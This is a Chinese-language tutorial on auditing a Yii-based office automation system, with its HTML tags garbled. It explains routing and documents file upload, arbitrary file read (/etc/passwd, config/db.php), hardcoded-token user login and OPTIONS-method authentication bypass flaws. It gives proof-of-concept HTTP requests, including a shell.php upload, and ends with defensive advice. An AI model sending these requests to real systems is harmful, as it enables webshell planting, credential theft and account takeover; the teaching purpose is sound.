YII框架安全审计实战教学文档<\/h1>

一、YII框架基础认知<\/h2>

1.1 框架结构分析<\/h3>

入口文件<\/strong>：\/web\/index.php<\/code> 是YII框架的主要入口<\/li>
模块化管理<\/strong>：系统以system<\/code>作为根目录进行模块化管理<\/li>

路由结构<\/strong>：采用模块名\/控制器\/操作<\/code>的形式，例如\/oa\/main\/login<\/code><\/li> <\/ul> 1.2 路由解析机制<\/h3> 典型路由格式：\/模块名\/控制器\/操作<\/code><\/li> 示例解析： \/oa\/main\/login<\/code> → system\/modules\/oa\/controllers\/MainController.php<\/code>中的login<\/code>方法<\/li> 控制器文件路径：system\/modules\/[模块名]\/controllers\/[控制器名]Controller.php<\/code><\/li> <\/ul> <\/li> <\/ul> 二、漏洞审计实战<\/h2> 2.1 任意文件上传漏洞<\/h3> 漏洞1：注释扩展名限制导致的上传<\/h4> 漏洞文件<\/strong>：system\/modules\/main\/extend\/SaveUpload.php<\/code><\/li> 漏洞成因<\/strong>：开发者注释掉了扩展后缀的限制代码<\/li> saveAs<\/code>方法未进行有效过滤<\/li> <\/ul> <\/li> 利用条件<\/strong>：找到调用SaveUpload::saveFile()<\/code>的控制器<\/li> 未授权访问或权限绕过<\/li> <\/ul> <\/li> <\/ul> 漏洞2：静态目录下的上传漏洞<\/h4> 漏洞文件<\/strong>：web\/static\/lib\/weboffice\/js\/OfficeServer.php<\/code><\/li> 漏洞特征<\/strong>：直接位于静态资源目录，可被直接访问<\/li> 通过JSON参数控制操作类型<\/li> <\/ul> <\/li> 利用方式<\/strong>： \/\/ 上传利用 <\/span><\/span><\/span><\/span>POST<\/span> \/<\/span>static<\/span>\/<\/span>lib<\/span>\/<\/span>weboffice<\/span>\/<\/span>js<\/span>\/<\/span>OfficeServer<\/span>.<\/span>php<\/span>?<\/span>FormData<\/span>=<\/span>{"OPTION"<\/span>:<\/span>"SAVEFILE"<\/span>,"FILEPATH"<\/span>:<\/span>"\/shell.php"<\/span>} <\/span><\/span> <\/span><\/span>\/\/ 文件下载利用 <\/span><\/span><\/span><\/span>GET<\/span> \/<\/span>static<\/span>\/<\/span>lib<\/span>\/<\/span>weboffice<\/span>\/<\/span>js<\/span>\/<\/span>OfficeServer<\/span>.<\/span>php<\/span>?<\/span>FormData<\/span>=<\/span>{"OPTION"<\/span>:<\/span>"LOADFILE"<\/span>,"FILEPATH"<\/span>:<\/span>"\/etc\/passwd"<\/span>} <\/span><\/span><\/code><\/pre><\/li> <\/ul> 实际可利用的未授权上传接口<\/h4> contacts\/default\/upload<\/code><\/li> salary\/record\/upload<\/code><\/li> knowledge\/default\/upload<\/code><\/li> <\/ol> 2.2 任意文件下载漏洞<\/h3> 同漏洞文件<\/strong>：OfficeServer.php<\/code><\/li> 利用方式<\/strong>：设置OPTION<\/code>为LOADFILE<\/code><\/li> 通过FILEPATH<\/code>参数指定目标文件路径<\/li> <\/ul> <\/li> 示例<\/strong>： GET<\/span> \/static\/lib\/weboffice\/js\/OfficeServer.php?FormData={"OPTION":"LOADFILE","FILEPATH":"..\/..\/config\/db.php"} HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 2.3 硬编码导致的任意用户登录<\/h3> 漏洞文件<\/strong>：system\/modules\/oa\/controllers\/AuthController.php<\/code><\/li> 漏洞机制<\/strong>：存在硬编码的认证逻辑<\/li> 用户凭证通过base64编码传输<\/li> 使用固定密钥生成token<\/li> <\/ul> <\/li> 利用步骤<\/strong>：获取存在的用户名（如zhangsan<\/code>）<\/li> Base64编码用户名：emhhbmdzYW4=<\/code><\/li> 计算token：md5("emhhbmdzYW4=" . "固定密钥")<\/code><\/li> 构造请求： GET<\/span> \/oa\/auth\/withub?user=emhhbmdzYW4=&token=b336aa3ea64e703583bb7cbe6d924269 HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> <\/li> <\/ul> 2.4 权限绕过漏洞<\/h3> 漏洞文件<\/strong>：api\/modules\/v1\/controllers\/UserController.php<\/code><\/li> 关键代码<\/strong>： public<\/span> $notAuthAction =<\/span> ['auth'<\/span>, 'verify-url'<\/span>]; <\/span><\/span><\/code><\/pre><\/li> 绕过原理<\/strong>：框架的behaviors<\/code>方法优先执行<\/li> 当请求方法为OPTIONS<\/code>或接口在notAuthAction<\/code>列表中时，跳过认证<\/li> 利用OPTIONS<\/code>方法绕过权限检查<\/li> <\/ol> <\/li> 利用方式<\/strong>：对需要认证的接口使用OPTIONS<\/code>方法请求<\/li> 示例： OPTIONS<\/span> \/oa-api.php\/v1\/user\/get-info?id=1 HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ul> 三、审计方法论总结<\/h2> 3.1 关键审计点<\/h3> 文件上传功能<\/strong>：<\/p> 全局搜索move_uploaded_file<\/code><\/li> 检查文件类型过滤逻辑<\/li> 验证保存路径是否可控<\/li> <\/ul> <\/li> 权限控制<\/strong>：<\/p> 检查notAuthAction<\/code>等白名单配置<\/li> 验证认证逻辑是否可绕过<\/li> 查找硬编码凭证<\/li> <\/ul> <\/li> 路由解析<\/strong>：<\/p> 理解框架路由机制<\/li> 识别非常规路由格式（如含-<\/code>的路由）<\/li> <\/ul> <\/li> <\/ol> 3.2 高效审计技巧<\/h3> 开发文档利用<\/strong>：<\/p> 查找系统开发文档了解架构<\/li> 分析文档中暴露的接口和路由信息<\/li> <\/ul> <\/li> 全局搜索策略<\/strong>：<\/p> 搜索关键函数：move_uploaded_file<\/code>、file_get_contents<\/code>等<\/li> 搜索敏感关键词：notAuth<\/code>、token<\/code>、secret<\/code>等<\/li> <\/ul> <\/li> 静态资源审计<\/strong>：<\/p> 检查static<\/code>、public<\/code>等目录下的PHP文件<\/li> 验证这些文件是否可直接访问<\/li> <\/ul> <\/li> <\/ol> 3.3 YII框架特有注意事项<\/h3> 路由格式多样性<\/strong>：<\/p> 标准格式：模块\/控制器\/操作<\/code><\/li> 可能存在的变体：模块-控制器\/操作<\/code>等<\/li> <\/ul> <\/li> 行为方法优先级<\/strong>：<\/p> behaviors()<\/code>方法通常优先执行<\/li> 权限检查可能在此方法中实现<\/li> <\/ul> <\/li> 配置覆盖风险<\/strong>：<\/p> 检查被注释的配置项<\/li> 验证默认配置是否被不安全覆盖<\/li> <\/ul> <\/li> <\/ol> 四、防御建议<\/h2> 4.1 开发层面<\/h3> 文件上传<\/strong>：<\/p> 严格限制上传文件类型<\/li> 使用白名单而非黑名单<\/li> 文件重命名存储<\/li> <\/ul> <\/li> 认证授权<\/strong>：<\/p> 避免硬编码凭证<\/li> 使用框架提供的标准认证组件<\/li> 敏感接口强制二次验证<\/li> <\/ul> <\/li> 路由安全<\/strong>：<\/p> 统一路由格式<\/li> 禁用不必要的HTTP方法<\/li> 实施严格的权限控制<\/li> <\/ul> <\/li> <\/ol> 4.2 运维层面<\/h3> 目录权限<\/strong>：<\/p> 限制静态目录的PHP执行权限<\/li> 上传目录设置为不可执行<\/li> <\/ul> <\/li> 代码保护<\/strong>：<\/p> 移除开发文档和测试接口<\/li> 禁用PHP错误回显<\/li> <\/ul> <\/li> 监控审计<\/strong>：<\/p> 监控异常文件操作<\/li> 记录敏感操作日志<\/li> <\/ul> <\/li> <\/ol> 五、附录：漏洞利用PoC<\/h2> 5.1 任意文件上传<\/h3> POST<\/span> \/index.php\/salary\/record\/upload HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target.com<\/span> <\/span><\/span>Content-Type:<\/span> multipart\/form-data; boundary=----WebKitFormBoundary12345<\/span> <\/span><\/span> <\/span><\/span>------WebKitFormBoundary12345 <\/span><\/span>Content-Disposition: form-data; name="file"; filename="shell.php" <\/span><\/span>Content-Type: image\/png <\/span><\/span> <\/span><\/span><?php phpinfo();?> <\/span><\/span>------WebKitFormBoundary12345-- <\/span><\/span><\/code><\/pre>5.2 权限绕过<\/h3> OPTIONS<\/span> \/oa-api.php\/v1\/user\/get-info?id=1 HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target.com<\/span> <\/span><\/span><\/code><\/pre>5.3 任意用户登录<\/h3> GET<\/span> \/oa\/auth\/withub?user=emhhbmdzYW4=&token=b336aa3ea64e703583bb7cbe6d924269 HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target.com<\/span> <\/span><\/span><\/code><\/pre>通过本教学文档，安全研究人员可以全面了解YII框架的安全审计方法，掌握常见漏洞的发现和利用技巧，同时也能为开发人员提供有效的安全防护建议。<\/p>